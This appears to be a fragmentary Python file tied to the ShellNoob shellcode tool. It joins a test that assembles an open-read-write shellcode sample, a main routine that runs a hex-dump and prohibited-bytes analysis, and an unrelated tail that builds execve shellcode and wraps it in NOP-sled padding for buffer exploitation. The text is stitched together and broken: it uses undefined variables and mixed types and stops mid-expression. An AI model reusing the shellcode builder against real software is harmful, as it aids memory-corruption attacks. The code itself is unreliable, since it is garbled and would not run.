def test_get_start_address():
stdout, stderr = '', ''
tmp_dir = mkdtemp()
asm_fp = join(tmp_dir, 'shellcode.asm')
exe_fp = join(tmp_dir, 'shellcode.exe')
secret_fp = '/tmp/secret'
os.system('echo "%s" > %s' % (SECRET_STR, secret_fp))
kernel = ShellNoob.get_kernel()
if kernel == 'Linux':
shutil.copyfile(
join(dirname(__file__), 'samples/x86-linux/open-read-write.asm'),
asm_fp)
elif kernel == 'FreeBSD':
shutil.copyfile(
join(dirname(__file__), 'samples/x86-freebsd/open-read-write.asm'),
asm_fp)
else:
raise Exception('testing on kernel %s not supported' % kernel)
_out, _err, _val = run_with_args('%s --to-exe' % asm_fp)
stdout += _out
stderr += _err
assert _val == 0
snoob = ShellNoob()
start_addr = snoob.get_start_address(exe_fp)
assert re.match('0x[0-9a-f]+', start_addr)
shutil.rmtree(tmp_dir)
os.unlink(secret_fp)
return stdout, stderr, 0
def main(argv):
"""Main method."""
args = parser.parse_args(argv[1:])
snoob = ShellNoob(args.is_64, args.intel)
hexcode = extract_hex_code(snoob, args.fmt, args.fp)
hexdump = hex_dump(hexcode)
print_hex_dump(hexdump)
inss = prohibited_bytes_analysis(
snoob, hexcode, args.blacklist, args.whitelist)
print_prohibited_bytes_analysis(inss)
for count in range(len(hex_code)):
if count > 0 and count % 8 == 0:
final_str += "push $0x%s \n" % str
str = ""
str += hex_code[count]
final_str += "push $0x%s \n" % str
shell_code += final_str + "movl %esp,%ebx\npush %eax\n" \
"push %ebx\nmov %esp, %ecx\nmovl %eax, %edx\nmov $11,%al\nint $0x80\nxor %eax,%eax\nmov $1,%al" \
"\nxor %ebx,%ebx\nint $0x80".encode("utf-8")
# output_file = open("shell.asm", "w")
# output_file.write(shell_code)
# output_file.close()
sn = ShellNoob(flag_intel=False)
hex_code = sn.asm_to_hex(shell_code)
hc = "\\x"
for i in range(0, len(hex_code)):
if i > 0 and i % 2 is 0:
hc += "\\x"
hc += hex_code[i]
diff = to_range - from_range - hc.count('x')
for i in range(0, 6):
hc = i * "\\x90" + (diff / 2 * "\\x90") + hc + (diff / 2 *
argv[2].decode())
